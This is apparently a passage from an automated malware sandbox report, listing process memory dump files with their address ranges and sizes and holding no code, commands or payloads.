                                                                                                                                                            • memory/2636-326-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.3MB

                                                                                                                                                            • memory/2636-329-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.3MB

                                                                                                                                                            • memory/2636-335-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.3MB

                                                                                                                                                            • memory/2660-333-0x0000000000400000-0x000000000081B000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              4.1MB

                                                                                                                                                            • memory/2720-471-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2720-473-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2720-475-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2720-478-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2720-481-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2720-480-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              328KB

                                                                                                                                                            • memory/2748-414-0x0000000000400000-0x000000000106E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              12.4MB

                                                                                                                                                            • memory/2748-585-0x0000000000400000-0x000000000106E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              12.4MB

                                                                                                                                                            • memory/2776-732-0x0000000000240000-0x00000000008EC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/2776-692-0x0000000000240000-0x00000000008EC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/2776-673-0x0000000000240000-0x00000000008EC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              6.7MB

                                                                                                                                                            • memory/2864-97-0x0000000001300000-0x00000000013A2000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              648KB

                                                                                                                                                            • memory/2892-608-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              56KB

                                                                                                                                                            • memory/2992-316-0x00000000011A0000-0x0000000001220000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              512KB